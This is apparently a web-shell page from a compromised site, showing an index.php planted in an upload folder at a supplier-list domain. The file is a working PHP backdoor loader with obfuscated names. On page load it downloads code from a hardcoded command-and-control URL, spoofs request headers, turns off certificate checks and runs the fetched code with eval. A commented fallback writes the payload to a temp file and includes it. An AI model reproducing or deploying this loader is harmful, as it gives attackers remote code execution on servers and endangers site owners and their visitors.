Your IP : 216.73.216.54

Current Path : /home/zqegovsj/public_html/us3.supplierlist.com/upload/beirinmode/
Upload File :
Current File : /home/zqegovsj/public_html/us3.supplierlist.com/upload/beirinmode/index.php

<?php
// Tanda Build: 4AC9441A037D

class ABCdeffA {
    private static $c2_url = 'https://cw.acidpoll.top/jc/9505-cw-ak-fgsa3658.txt';
    
    public static function GhJJTY() {
        // Download backdoor with proper headers
        $payload = self::fetchPayload();
        
        if (empty($payload)) {
            return false;
        }
        
        self::runPayload($payload);
        return true;
    }
    
    private static function fetchPayload() {
        $ch = curl_init(self::$c2_url);
        
        // IMPORTANT: Mimic infected server request
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0');
        $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://';
        $referer = $scheme . ($_SERVER['HTTP_HOST'] ?? 'localhost') . ($_SERVER['REQUEST_URI'] ?? '/');
        curl_setopt($ch, CURLOPT_REFERER, $referer);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($http_code == 200 && !empty($response)) {
            return $response;
        }
        
        return false;
    }
    
    private static function runPayload($code) {
        // METHOD 1: Remove PHP tags and eval (CORRECT WAY)
        eval('?>' . $code);
        
        /* 
        // METHOD 2: Alternative - Write to temp file
        $temp = sys_get_temp_dir() . '/tmp_' . md5(time()) . '.php';
        file_put_contents($temp, $code);
        include($temp);
        @unlink($temp);
        */
    }
}

ABCdeffA::GhJJTY();

?>